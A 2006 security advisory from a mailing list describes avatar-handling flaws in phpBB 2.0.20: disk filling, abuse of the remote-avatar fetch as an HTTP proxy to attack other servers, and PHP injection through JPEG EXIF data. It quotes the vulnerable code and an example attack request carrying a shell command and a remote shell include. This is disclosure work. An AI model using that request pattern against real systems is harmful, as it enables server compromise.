PHPBB 2.0.20 persistent issues with avatars May 12 2006 07:32PM
rgod autistici org
PHPBB 2.0.20 multiple issues with avatars

some problems persistently lie in the way it handles remote and uploaded avatars:

a remote user can:

(1) saturate the server with unuseful files, 'cause phpbb do not delete

the previous one when you upload a new avatar

(2) use PhpBB installations to launch exploits against other servers,

using "avatarurl" argument when you modify your profile as path

of a GET request.

Look usercp_avatar.php near lines 125-153:


if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )


if ( empty($url_ary[4]) )


$error = true;

$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];



$base_get = '/' . $url_ary[4];

$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )


$error = true;

$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];



@fputs($fsock, "GET $base_get HTTP/1.1\r\n");

@fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");


while( !@feof($fsock) )


$avatar_data .= @fread($fsock, $board_config['avatar_filesize']);




phpbb do not check if the user supplied value ends with an image extension, neither

checks if the supplied string contains "&" and "?" chars. So, you can submit a value

like this:


phpbb will launch a GET request like this:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0

HOST: some_vulnerable.host

Connection: close

obviously you have no output, but this makes phpbb to be like a http proxy

(3) inject some php code inside jpeg files as EXIF metadata content:

this, in combinations with third party vulnerable code can be used

to compromise the server where PHP is installed.

Should be enough to check for php code inside the temporary files

before to copy the new avatar in "images/avatars/" folder.



mail: rgod [at] autistici [dot] org

site: http://retrogod.altervista.org

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus